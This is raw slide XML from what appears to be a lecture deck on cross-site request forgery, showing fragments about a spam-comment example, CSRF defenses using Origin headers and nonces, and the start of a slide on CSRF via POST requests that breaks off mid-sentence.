              <a:rPr sz="1600" spc="7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>“SPAM </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>CO</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="13" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ME</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="13" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="13" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="object 4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48" name="object 48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3556001" y="1701733"/>
            <a:ext cx="3589020" cy="321520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F1F1F1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="33867" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="122764">
              <a:spcBef>
                <a:spcPts val="267"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;input</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-67" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>type="hidden"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" spc="-60" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1867" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:latin typeface="Courier New"/>
              <a:cs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4020311" y="450638"/>
            <a:ext cx="4153747" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-80" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-27" dirty="0"/>
              <a:t>Defense</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="1476411"/>
            <a:ext cx="10604500" cy="4401204"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="86359" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="474121" indent="-458035">
              <a:spcBef>
                <a:spcPts val="679"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="474121" algn="l"/>
                <a:tab pos="474968" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>headers</a:t>
            </a:r>
            <a:endParaRPr sz="4267">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1008355" lvl="1" indent="-382684">
              <a:spcBef>
                <a:spcPts val="467"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="1009201" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="47" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-60" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>header,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>similar</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="47" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-80" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Referer.</a:t>
            </a:r>
            <a:endParaRPr sz="3733">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1008355" marR="6773" lvl="1" indent="-382684">
              <a:lnSpc>
                <a:spcPts val="4027"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="967"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="1009201" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3733" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Unlike</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-80" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Referer,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>shows</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>scheme,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>host,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="47" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>port </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-820" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>(no</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>string)</a:t>
            </a:r>
            <a:endParaRPr sz="3733">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" indent="-458035">
              <a:spcBef>
                <a:spcPts val="440"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="474121" algn="l"/>
                <a:tab pos="474968" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Nonce-based</a:t>
            </a:r>
            <a:endParaRPr sz="4267">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1008355" marR="311564" lvl="1" indent="-382684">
              <a:lnSpc>
                <a:spcPts val="4027"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="947"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="1009201" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>nonc</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-47" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>o ensu</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-67" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-47" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>form.php</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-1433" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>an  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>share.php.</a:t>
            </a:r>
            <a:endParaRPr sz="3733">
              <a:latin typeface="Courier New"/>
              <a:cs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4731" y="450638"/>
            <a:ext cx="7084907" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-33" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>via</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-27" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-53" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-13" dirty="0"/>
              <a:t>requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714588" y="1608327"/>
            <a:ext cx="10224345" cy="833519"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="3387" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773">
              <a:lnSpc>
                <a:spcPct val="103499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="27"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Consider</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Referrer</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-1007" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>outlined</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>earlier.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>In</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-579" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>case</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Calibri"/>
